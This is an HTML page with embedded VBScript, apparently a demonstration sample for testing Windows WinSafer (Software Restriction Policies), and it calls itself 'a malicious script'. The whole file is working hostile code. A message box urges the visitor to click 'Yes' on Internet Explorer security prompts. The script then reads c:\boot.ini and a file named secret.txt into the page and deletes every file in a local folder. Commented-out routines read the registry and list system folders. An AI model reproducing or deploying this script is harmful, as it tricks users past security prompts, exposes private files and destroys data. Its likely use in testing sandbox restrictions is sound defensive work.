129 lines
3.8 KiB
HTML
129 lines
3.8 KiB
HTML
|
<html>
|
||
|
<head>
|
||
|
<title>Example WinSafer Html script</title>
|
||
|
</head>
|
||
|
<body>
|
||
|
<h1>Example WinSafer Html script</h1>
|
||
|
|
||
|
|
||
|
<script language="vbscript">
|
||
|
|
||
|
msgbox("Hello friend, please press 'Yes' when Internet Explorer asks you a question!")
|
||
|
|
||
|
</script>
|
||
|
|
||
|
<table bgcolor="#cccc99" border=3>
|
||
|
<tr><th>Script output is below:</th></tr>
|
||
|
<tr><td bgcolor="#eeeeaa">
|
||
|
<script language="vbscript">
|
||
|
|
||
|
Option Explicit
|
||
|
|
||
|
const filename1 = "c:\boot.ini"
|
||
|
const filename2 = "e:\secret.txt"
|
||
|
const foldername1 = "e:\spam"
|
||
|
|
||
|
document.write("Howdy. I am a malicious script.<br>")
|
||
|
document.write("<hr>")
|
||
|
call ReadTheFile(filename1)
|
||
|
document.write("<hr>")
|
||
|
call ReadTheFile(filename2)
|
||
|
document.write("<hr>")
|
||
|
|
||
|
rem call DisplaySpecialFolders
|
||
|
rem document.write("<hr>")
|
||
|
rem call ReadTheRegistry
|
||
|
rem document.write("<hr>")
|
||
|
|
||
|
call DeleteFiles(foldername1)
|
||
|
|
||
|
|
||
|
sub ReadTheRegistry
|
||
|
On error resume next
|
||
|
dim wscr, rr
|
||
|
set wscr = CreateObject("WScript.Shell")
|
||
|
set rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EmailName")
|
||
|
document.write("Read the registry: " & rr)
|
||
|
end sub
|
||
|
|
||
|
Sub ReadTheFile(filename)
|
||
|
On error resume next
|
||
|
dim fso, fileinput, linetext
|
||
|
Set fso = CreateObject("Scripting.FileSystemObject")
|
||
|
Err.Clear
|
||
|
set fileinput = fso.OpenTextFile(filename,1)
|
||
|
if (Err.Number <> 0) then
|
||
|
document.write("I failed to open the file <B>" & filename & "</B> for reading: " & Err.Description & "<br>")
|
||
|
else
|
||
|
linetext = fileinput.ReadAll
|
||
|
fileinput.Close
|
||
|
document.write("I just read the file <B>" & filename & "</B> and it contained:<br><pre>" & linetext & "</pre><br>")
|
||
|
End if
|
||
|
End Sub
|
||
|
|
||
|
Sub DeleteFiles(foldername)
|
||
|
On error resume next
|
||
|
dim fso, Folder, Files, File, filecount
|
||
|
Set fso = CreateObject("Scripting.FileSystemObject")
|
||
|
document.write("<ul>")
|
||
|
document.write("<li>Going to delete all files from " & foldername)
|
||
|
Err.Clear
|
||
|
set Folder = fso.GetFolder(foldername)
|
||
|
if (Err.Number <> 0) then
|
||
|
document.write("<li>Failed to access <B>" & foldername & "</b>: " & Err.Description)
|
||
|
else
|
||
|
set files = Folder.Files
|
||
|
if (Err.Number <> 0) then
|
||
|
document.write("<li>Failed to access <B>" & foldername & "</b>: " & Err.Description)
|
||
|
else
|
||
|
filecount = Files.Count
|
||
|
if Err.Number <> 0 then
|
||
|
document.write("<li>Failed to access folder: " & Err.Description)
|
||
|
else
|
||
|
document.write("<li>There are " & CStr(filecount) & " files within <b>" & foldername & "</b>")
|
||
|
for each File in Files
|
||
|
Err.Clear
|
||
|
document.write("<li>" & File.Path)
|
||
|
if (Err.Number <> 0) then
|
||
|
document.write("<li>Failed to delete files: " & Err.Description)
|
||
|
else
|
||
|
Err.Clear
|
||
|
FSO.DeleteFile(File.Path)
|
||
|
if (Err.Number <> 0) then
|
||
|
document.write(": failed to delete, " & Err.Description)
|
||
|
else
|
||
|
document.write(": <B>successfully deleted!!</B>")
|
||
|
end if
|
||
|
end if
|
||
|
Next
|
||
|
end if
|
||
|
end if
|
||
|
end if
|
||
|
document.write("</ul>")
|
||
|
end sub
|
||
|
|
||
|
sub DisplaySpecialFolders
|
||
|
On error resume next
|
||
|
|
||
|
dim fso, dirwin, dirsystem, dirtemp
|
||
|
Set fso = CreateObject("Scripting.FileSystemObject")
|
||
|
Set dirwin = fso.GetSpecialFolder(0)
|
||
|
Set dirsystem = fso.GetSpecialFolder(1)
|
||
|
Set dirtemp = fso.GetSpecialFolder(2)
|
||
|
|
||
|
document.write("Your Windows directory is: " & dirwin & "<br>")
|
||
|
document.write("Your System directory is: " & dirsystem & "<br>")
|
||
|
document.write("Your Temporary directory is: " & dirtemp & "<br>")
|
||
|
|
||
|
rem Interestingly enough, when running in an untrusted level,
|
||
|
rem the vbscript fails to be able to determine the user's
|
||
|
rem personal temporary directory.
|
||
|
|
||
|
end sub
|
||
|
|
||
|
</script>
|
||
|
</td></tr></table>
|
||
|
|
||
|
</body>
|
||
|
</html>
|